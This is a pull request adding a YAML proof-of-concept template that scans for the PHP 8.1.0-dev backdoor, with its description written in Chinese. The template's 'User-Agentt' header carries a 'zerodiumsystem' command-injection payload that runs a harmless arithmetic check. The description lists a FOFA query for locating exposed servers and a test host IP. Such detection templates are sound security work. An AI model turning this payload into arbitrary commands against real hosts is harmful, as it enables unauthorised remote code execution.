### PR TITLE
Create php8-dev-rce.yml

### DIFF
--- a/pocs/php8-dev-rce.yml
+++ b/pocs/php8-dev-rce.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-php8-dev-rce
+set:
+  rand1: randomInt(1099000, 9999999)
+  rand2: randomInt(1009900, 9999999)
+rules:
+  - method: GET
+    path: /
+    headers:
+      User-Agentt: zerodiumsystem('expr {{rand1}} + {{rand2}}');
+    expression: |
+      response.body.bcontains(bytes(string(rand1 + rand2)))
+detail:
+  author: tangshoupu
+  info: PHP 8.1.0-dev 后门远程命令执行
+  links:
+    - https://packetstormsecurity.com/files/162864/PHP-8.1.0-dev-Backdoor-Remote-Command-Execution.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
PHP 8.1.0-dev 后门远程命令执行

## 测试环境
http://49.233.175.152:8080/

## 备注
fofa:  "PHP/8.1.0-dev"


![image](https://user-images.githubusercontent.com/50769953/122538549-327f6600-d016-11eb-9db4-5e5ee72eb1a6.png)

![image](https://user-images.githubusercontent.com/50769953/122538357-fe0baa00-d015-11eb-903c-055ee5f14e21.png)

